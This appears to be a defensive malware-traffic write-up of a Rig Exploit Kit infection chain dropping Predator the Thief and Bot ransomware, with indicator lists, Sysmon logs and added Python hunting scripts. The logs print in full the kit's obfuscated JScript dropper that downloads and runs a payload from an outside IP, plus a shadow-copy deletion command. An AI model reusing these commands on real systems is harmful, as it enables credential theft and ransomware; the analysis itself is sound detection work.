Rig Exploit Kit delivers Predator the Thief and Bot Ransomware

Predator the Thief steals passwords from browsers and cryptocurrency wallets on infected hosts. A good analysis can be found at Fortinet.com.

Bot ransomware has been linked to Dharma ransomware by many researchers. In this infection the host's files were encrypted and renamed with the file extension [admin@sectex.net].bot. A link to the first reported sighting of Bot Ransomware can be found at www.bleepingcomputer.com.

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected", all lowercase.

PCAP file of the infection traffic:
2019-11-19-RigEK-pcap.zip

 

ASSOCIATED DOMAINS:

209.126.103.139 – ticketskings.net – Redirect to RigEK
3.226.8.132 – usa.lupus-bra.com – Redirect to RigEK
94.130.90.228 – atztds25.world GET /vsrgq4gse43t4tw – Redirect Gate to RigEK
188.225.83.250 – Rig Exploit Kit
212.73.150.115 – POST /api/gate.get – Predator the Thief C2
45.147.229.149 – nadvexmail19mn.xyz GET /socks111atx.exe – Payload Delivery
192.64.119.112 – blogserv27.com POST /blogpics17/ – Payload Delivery
45.147.229.149 – nadvexmail19mn.xyz GET /socks.dll – Payload Delivery
185.222.202.235 – blogserv279.club POST /blogpics17/ – Payload Delivery
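The indicator lines above mix three levels of precision: a bare IP (the Rig EK server), an IP plus hostname (the redirectors), and an IP plus hostname plus HTTP method and URI (the gate, the C2 check-in and the payload downloads). The following script is an added example, not part of the original post, showing one way to turn that list into a matcher that scores proxy or Zeek-style HTTP requests by specificity and labels each with the stage of the chain it belongs to. The indicator text is the post's own list; the `HttpRequest` records, the `Indicator`/`HttpRequest` class names and the scoring weights are constructed for this example, and the final request (198.51.100.7 / example.com) is a constructed benign control.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Indicator lines copied from the post's ASSOCIATED DOMAINS list (page data, not constructed).
IOC_TEXT = """\
209.126.103.139 – ticketskings.net – Redirect to RigEK
3.226.8.132 – usa.lupus-bra.com – Redirect to RigEK
94.130.90.228 – atztds25.world GET /vsrgq4gse43t4tw – Redirect Gate to RigEK
188.225.83.250 – Rig Exploit Kit
212.73.150.115 – POST /api/gate.get – Predator the Thief C2
45.147.229.149 – nadvexmail19mn.xyz GET /socks111atx.exe – Payload Delivery
192.64.119.112 – blogserv27.com POST /blogpics17/ – Payload Delivery
45.147.229.149 – nadvexmail19mn.xyz GET /socks.dll – Payload Delivery
185.222.202.235 – blogserv279.club POST /blogpics17/ – Payload Delivery
"""
METHODS = {"GET", "POST"}


@dataclass
class Indicator:
    ip: str
    role: str
    host: Optional[str] = None
    method: Optional[str] = None
    path: Optional[str] = None


@dataclass
class HttpRequest:
    """One proxy/Zeek-style HTTP request: destination IP, Host header, method, URI path."""
    dst_ip: str
    host: str
    method: str
    path: str


def parse_indicators(text: str) -> list[Indicator]:
    """Turn 'IP – [host] [METHOD /path] – role' lines into structured indicators."""
    out = []
    for line in text.splitlines():
        parts = [p.strip() for p in re.split(r"\s[\u2013-]\s", line) if p.strip()]
        if len(parts) < 2:
            continue
        ind = Indicator(ip=parts[0], role=parts[-1])
        if len(parts) == 3:  # middle part: optional host, optional "METHOD /path"
            tokens = parts[1].split()
            if tokens and tokens[0] not in METHODS:
                ind.host = tokens.pop(0).lower()
            if len(tokens) == 2 and tokens[0] in METHODS:
                ind.method, ind.path = tokens
        out.append(ind)
    return out


def best_match(req: HttpRequest, indicators: list[Indicator]) -> Optional[Indicator]:
    """Most specific indicator for a request. IP or host alone scores 1 each; a matching
    method+path adds 2. An indicator that names a path the request does not hit still
    matches on the address alone, so traffic to a known C2 IP is never silently dropped."""
    best, best_score = None, 0
    for ind in indicators:
        ip_hit = ind.ip == req.dst_ip
        host_hit = ind.host is not None and ind.host == req.host.lower()
        uri_hit = (ind.path is not None and ind.method == req.method
                   and req.path.startswith(ind.path))
        score = ip_hit + host_hit + 2 * uri_hit
        if (ip_hit or host_hit) and score > best_score:
            best, best_score = ind, score
    return best


def classify(requests: list[HttpRequest], indicators: list[Indicator]) -> list[tuple[str, str]]:
    """Label each request with the chain stage it belongs to (or 'no match')."""
    labels = []
    for req in requests:
        ind = best_match(req, indicators)
        labels.append((f"{req.method} {req.host}{req.path}", ind.role if ind else "no match"))
    return labels


# Constructed HTTP requests, in the order an infected host would make them.
SAMPLE_REQUESTS = [
    HttpRequest("209.126.103.139", "ticketskings.net", "GET", "/"),
    HttpRequest("94.130.90.228", "atztds25.world", "GET", "/vsrgq4gse43t4tw"),
    HttpRequest("188.225.83.250", "188.225.83.250", "GET", "/?MzMyMDEw"),
    HttpRequest("212.73.150.115", "v73659.vps-ag.com", "POST", "/api/gate.get"),
    HttpRequest("45.147.229.149", "nadvexmail19mn.xyz", "GET", "/socks111atx.exe"),
    HttpRequest("198.51.100.7", "example.com", "GET", "/"),  # constructed benign control
]

if __name__ == "__main__":
    for request, role in classify(SAMPLE_REQUESTS, parse_indicators(IOC_TEXT)):
        print(f"{role:24s} {request}")
```

Run as-is it prints the six sample requests with their chain stage; in practice `SAMPLE_REQUESTS` would be replaced by rows read from a proxy log or Zeek `http.log`. Note that the Predator C2 check-in on 212.73.150.115 matches on IP plus URI even though the Host header seen in the pcap (v73659.vps-ag.com) is not part of the indicator, which is why the matcher scores address and URI independently.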

ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[Sysmon Event 1] – RigEK exploiting Iexplorer
Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d “%%tmp%%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“”+”WScr”+”ipt”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz” “ยค”
CurrentDirectory C:\Users\Rick\Desktop\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine “C:\Program Files\Internet Explorer\iexplore.exe” SCODEF:3996 CREDAT:144385 /prefetch:2

[Sysmon Event 1] – Wscript calling for payload after exploit
Image C:\Windows\System32\wscript.exe
CommandLine wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine CMd.exe /q /c cd /d “%tmp%” && echo function Q(n,g){for(var c=0,s=String,d,D=”pus”+”h”,b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%g[“length”])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O=”fromC”,S=O+”harCode”;e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E=”WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s “,u=function(x){return E[“split”](“I”)[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[“”+”WScr”+”ipt”]]:0;U=U[1],L=U[u(14)],v=u(9),m=U[“Ar”+”guments”];s.Type=2;c=q[u(8)]();s.Charset=u(012);s[“Open”]/**/();i=H(m);d=i[v](i[u(12)](“PE\x00\x00”)+027);s[“writetext”](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K=”saveto”;s[K+”file”](c,2);s.Close();z^&^&(c=”Regsvr32″+p+u(18)+c);j.run(“cmd”+p+” /c “+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+”.”+T+u(1));d[“SetProxy”](n);d[“Op”+”en”](u(2),g(1),n);d[“Option”](0)=g(2);d[“Send”];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz”

[Sysmon Event 3] – Iexplorer communicating with RigEK
Image C:\Program Files\Internet Explorer\iexplore.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 188.225.83.250
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 3] – Wscript communicating with RigEK
Image C:\Windows\System32\wscript.exe
User Rick-PC\Rick
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 188.225.83.250
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1] – Original payload process creation
Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\System32\cmd.exe” /c radD8D54.tmp.exe
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Windows\System32\wscript.exe
ParentCommandLine wsCripT //B //E:JScript n.t “L1ZytEDoD” “http://188.225.83.250/?MzMyMDEw&LgQvtF&QWV=community&HteRc=border&yEJslB=disagree&bAhKLbtm=callous&VBcoHs=disagree&lWgvWcyNZ=mustard&hztfpvGxf=dinamic&XGuy=abettor&PPEn=abettor&JOSRZS=difference&HSnLJqikZ=everyone&mKw=everyone&t4gdfdff4=aFXmhUSCfw1klIZaVAxF962m30iDzR7KiMWF-hWOMF9NrpacRrcL3V71xrAQeMIv90vC6mlg&ffd3dfdfs=wnbQMvXcJRXQFYbHKuXDSKJDKU7WG0aVw4-fhMG3YpjNfynz1-zURnL1tASVVFqRrbMdJboD&YTzgNTMwNTcz”

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
CommandLine radD8D54.tmp.exe
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=782BCE7A2A5A083B7E9BDE6D4DAAE492,SHA256=A8BF9EF68C8DA8EB556A764FA55C07B63066236541C0392C9D13F0BE7E712539
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\System32\cmd.exe” /c radD8D54.tmp.exe

[Sysmon Event 3] – Predator the Thief communicating with C2
Image C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 212.73.150.115
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Roaming\socks111atx.exe
CommandLine “C:\Users\Rick\AppData\Roaming\socks111atx.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=0E8A8ED0A6F9BD7120A3CFF4318EAB10,SHA256=0AE80985C40C6FFAF999AE12B9856264386C365749141DDC67219766DEE77351
ParentImage C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
ParentCommandLine radD8D54.tmp.exe

[Sysmon Event 1]
Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 && del “C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
ParentCommandLine radD8D54.tmp.exe

[Sysmon Event 1]
Image C:\Windows\System32\PING.EXE
CommandLine ping 127.0.0.1
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=6242E3D67787CCBF4E06AD2982853144,SHA256=4CA10DBA7FF487FDB3F1362A3681D7D929F5AA1262CDFD31B04C30826983FB1D
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 && del “C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe”

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
SourceIp 192.168.137.111
DestinationIp 45.147.229.149
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Roaming\socks111atx.exe
CommandLine “C:\Users\Rick\AppData\Roaming\socks111atx.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=0E8A8ED0A6F9BD7120A3CFF4318EAB10,SHA256=0AE80985C40C6FFAF999AE12B9856264386C365749141DDC67219766DEE77351
ParentImage C:\Users\Rick\AppData\Roaming\socks111atx.exe
ParentCommandLine “C:\Users\Rick\AppData\Roaming\socks111atx.exe”

[Sysmon Event 1]
Image C:\Windows\System32\cmd.exe
CommandLine “C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 && del “C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe”
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe
ParentCommandLine radFB737.tmp.exe

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 212.73.150.115
DestinationHostname v73659.vps-ag.com
DestinationPort 80
DestinationPortName http

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\radFB737.tmp.exe
Protocol tcp
SourceIp 192.168.137.111
DestinationIp 45.147.229.149
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 2]
Image C:\Windows\Explorer.EXE
TargetFilename C:\Users\Rick\AppData\Roaming\wbttadv

[Sysmon Event 1] – Regsvr32.exe executing malicious dll
Image C:\Windows\System32\regsvr32.exe
CommandLine regsvr32 /s C:\Users\Rick\AppData\Local\Temp\CD2D.tmp.dll
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

[Sysmon Event 1] – Regsvr32.exe executing malicious dll
Image C:\Windows\System32\regsvr32.exe
CommandLine regsvr32 /s C:\Users\Rick\AppData\Local\Temp\D5F4.tmp.dll
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

[Sysmon Event 1]
Image C:\Users\Rick\AppData\Local\Temp\E5FC.tmp.exe
CommandLine C:\Users\Rick\AppData\Local\Temp\E5FC.tmp.exe
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=F2F689224DB1A035D7CEFFEB3E4B9C79,SHA256=6DFDD8CC3708DD08D4F92872C9415EA223DE03434C849D0A8CF795BA6E0482D5
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE

[Sysmon Event 1] – Mode.com process creation associated with ransomware
Image C:\Windows\System32\mode.com
CommandLine mode con cp select=1251
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=F015208F1F8473BA2E4BC229E0D38EFD,SHA256=EFC11F8FCDD0A8649EBEE758B105DB10536E895EA6D586A07B61F68B1E5DBD20
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\system32\cmd.exe”

[Sysmon Event 1] – Vssadmin deleting shadow copies during ransomware infection
Image C:\Windows\System32\vssadmin.exe
CommandLine vssadmin delete shadows /all /quiet
CurrentDirectory C:\Users\Rick\AppData\Local\Temp\
Hashes MD5=6E248A3D528EDE43994457CF417BD665,SHA256=E09BF4D27555EC7567A598BA89CCC33667252CEF1FB0B604315EA7562D18AD10
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine “C:\Windows\system32\cmd.exe”

[Sysmon Event 3]
Image C:\Users\Rick\AppData\Local\Temp\A0.tmp.exe
SourceIp 192.168.137.111
DestinationIp 212.73.150.115
DestinationHostname v73659.vps-ag.com
DestinationPort 80
DestinationPortName http

[Sysmon Event 1] – Mshta.exe creating ransomware message screen after files encrypted
Image C:\Windows\System32\mshta.exe
CommandLine “C:\Windows\System32\mshta.exe” “C:\Users\Rick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
Hashes MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820
ParentImage C:\Users\Rick\AppData\Local\Temp\EF9E.tmp.exe
ParentCommandLine “C:\Users\Rick\AppData\Local\Temp\EF9E.tmp.exe” -a

[Sysmon Event 1] – Notepad.exe creating ransom note after files encrypted
Image C:\Windows\System32\notepad.exe
CommandLine “C:\Windows\system32\NOTEPAD.EXE” C:\Users\Rick\Desktop\FILES ENCRYPTED.txt
CurrentDirectory C:\Users\Rick\Desktop\
Hashes MD5=D378BFFB70923139D6A4F546864AA61C,SHA256=C4232DDD4D37B9C0884BD44D8476578C54D7F98D58945728E425736A6A07E102
ParentImage C:\Windows\explorer.exe
ParentCommandLine C:\Windows\Explorer.EXE
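The Sysmon excerpts above describe a chain of process behaviours that are worth encoding as hunting rules rather than hash lookups: a browser spawning cmd.exe, cmd.exe echoing a script to a file and launching it with `wscript //E:JScript`, `regsvr32 /s` loading a .dll from %TEMP%, `vssadmin delete shadows`, the `ping 127.0.0.1 && del` self-delete, and mshta.exe opening an .hta from the Startup folder. The script below is an added example, not part of the original post, that parses records in the same "[Sysmon Event N] – label" / "Key value" layout used on this page and runs those rules over them. The sample records are constructed, shortened copies of the page's own excerpts (the obfuscated JScript body is replaced by a placeholder because only the cmd.exe wrapper matters to the rule); the rule names, the `BROWSERS`/`SCRIPT_HOSTS` sets and the `SysmonRecord` class are this example's own, and `KNOWN_C2_IPS` is taken from the post's ASSOCIATED DOMAINS list.

```python
import re
from dataclasses import dataclass, field

# Addresses from the post's ASSOCIATED DOMAINS section (page data, not constructed).
KNOWN_C2_IPS = {"188.225.83.250", "212.73.150.115", "45.147.229.149",
                "192.64.119.112", "185.222.202.235"}
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}

# Constructed sample: shortened copies of the post's Sysmon excerpts. The obfuscated
# JScript body is replaced by a placeholder; only the cmd.exe wrapper matters here.
SAMPLE_LOG = r"""
[Sysmon Event 1] - RigEK exploiting Iexplorer
Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d "%tmp%" && echo function Q(n,g){JSCRIPT-OMITTED}>n.t && stArT wsCripT //B //E:JScript n.t "L1ZytEDoD" "http://188.225.83.250/?MzMyMDEw"
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
[Sysmon Event 3] - Wscript communicating with RigEK
Image C:\Windows\System32\wscript.exe
DestinationIp 188.225.83.250
DestinationPort 80
[Sysmon Event 1]
Image C:\Windows\System32\cmd.exe
CommandLine "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe"
ParentImage C:\Users\Rick\AppData\Local\Temp\radD8D54.tmp.exe
[Sysmon Event 1] - Regsvr32.exe executing malicious dll
Image C:\Windows\System32\regsvr32.exe
CommandLine regsvr32 /s C:\Users\Rick\AppData\Local\Temp\CD2D.tmp.dll
ParentImage C:\Windows\explorer.exe
[Sysmon Event 1] - Vssadmin deleting shadow copies
Image C:\Windows\System32\vssadmin.exe
CommandLine vssadmin delete shadows /all /quiet
ParentImage C:\Windows\System32\cmd.exe
[Sysmon Event 1] - Mshta.exe showing the ransom screen
Image C:\Windows\System32\mshta.exe
CommandLine "C:\Windows\System32\mshta.exe" "C:\Users\Rick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta
ParentImage C:\Users\Rick\AppData\Local\Temp\EF9E.tmp.exe
"""

HEADER_RE = re.compile(r"^\[(?:Sysmon )?Event (\d+)\](?:\s*[-\u2013]\s*(.*))?$")

@dataclass
class SysmonRecord:
    event_id: int
    label: str
    fields: dict[str, str] = field(default_factory=dict)

    def get(self, key: str) -> str:
        return self.fields.get(key, "")

def parse_records(text: str) -> list[SysmonRecord]:
    """Parse '[Sysmon Event N] - label' headers followed by 'Key value' lines."""
    records: list[SysmonRecord] = []
    for ln in (raw.strip() for raw in text.splitlines()):
        m = HEADER_RE.match(ln)
        if m:
            records.append(SysmonRecord(int(m.group(1)), (m.group(2) or "").strip()))
        elif ln and records:
            key, _, value = ln.partition(" ")
            records[-1].fields[key] = value.strip()
    return records

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def process_rules(rec: SysmonRecord) -> list[str]:
    """Event 1 (process creation) behaviours seen in this chain, most generic first."""
    image, parent = basename(rec.get("Image")), basename(rec.get("ParentImage"))
    cmd = rec.get("CommandLine").lower()
    hits = []
    if parent in BROWSERS and image in SCRIPT_HOSTS:
        hits.append("browser_spawned_script_host")  # iexplore.exe -> cmd.exe
    if image == "cmd.exe" and "echo " in cmd and "//e:jscript" in cmd:
        hits.append("inline_jscript_dropper")  # echo ...>n.t && wscript //E:JScript n.t
    if image == "regsvr32.exe" and re.search(r"\\temp\\[^ ]*\.dll", cmd):
        hits.append("regsvr32_temp_dll")  # regsvr32 /s %TEMP%\*.tmp.dll
    if image == "vssadmin.exe" and "delete shadows" in cmd:
        hits.append("shadow_copy_deletion")  # classic pre-encryption step
    if image == "cmd.exe" and "ping 127.0.0.1" in cmd and "del " in cmd:
        hits.append("ping_delay_self_delete")  # dropper removed after a ping delay
    if image == "mshta.exe" and re.search(r'\\startup\\[^"]*\.hta', cmd):
        hits.append("hta_in_startup_folder")  # ransom screen re-shown at every logon
    return hits

def network_rules(rec: SysmonRecord) -> list[str]:
    """Event 3 (network connection) checks."""
    hits = []
    if rec.get("DestinationIp") in KNOWN_C2_IPS:
        hits.append("known_c2_ip")
    if basename(rec.get("Image")) in SCRIPT_HOSTS and rec.get("DestinationPort") == "80":
        hits.append("script_host_http_egress")
    return hits

def hunt(text: str) -> list[tuple[int, str, list[str]]]:
    """Return (record index, image basename, rule hits) for every record that fires."""
    findings = []
    for idx, rec in enumerate(parse_records(text)):
        hits = process_rules(rec) if rec.event_id == 1 else (
            network_rules(rec) if rec.event_id == 3 else [])
        if hits:
            findings.append((idx, basename(rec.get("Image")), hits))
    return findings
```

Calling `hunt(SAMPLE_LOG)` returns one entry per sample record, the first with both `browser_spawned_script_host` and `inline_jscript_dropper` (the exploit stage alone), and `regsvr32_temp_dll`, `shadow_copy_deletion` and `hta_in_startup_folder` for the later ransomware stages. The rules key on parent/child relationships and command-line shapes rather than the hashes listed above, since the `.tmp.exe` and `.tmp.dll` names and hashes change between runs of the kit while the wrapper behaviour does not; the `known_c2_ip` rule is the one that will age quickly.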

 

IMAGES AND DETAILS:

Shown above: Ransom note associated with the infection [Info.hta]

Shown above: Some of the network traffic leading to and associated with the infection

Shown above: One of the redirects using gzip compression for its redirect

Shown above: The gzip redirect extracted and decompressed using Wireshark's 'Export Objects'

Shown above: Predator the Thief POSTing stolen browser credentials, packed in a ZIP file, to its command and control (C2) server


MALICIOUS PAYLOAD ASSOCIATED WITH RIG EK:
File hashes are provided in the Sysmon process creation logs above.